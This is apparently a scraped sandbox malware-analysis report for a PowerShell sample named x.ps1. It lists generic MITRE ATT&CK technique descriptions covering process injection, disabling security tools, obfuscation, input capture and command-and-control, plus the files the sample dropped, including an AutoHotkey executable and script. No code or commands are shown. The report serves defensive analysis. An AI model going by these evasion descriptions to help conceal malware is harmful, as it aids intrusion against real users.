Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report x.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Documents\A.txt

C:\Users\Public\Documents\AutoHotkey64.ahk

C:\Users\Public\Documents\AutoHotkey64.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehgsqvhe.utp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lolkrnlj.vyx.ps1

C:\Users\user\AppData\Roaming\Logs\12-18-2024

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EGMBDDDRSIC84HDBHO5E.temp

Static File Info

General

File Icon

Windows Analysis Report
x.ps1

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre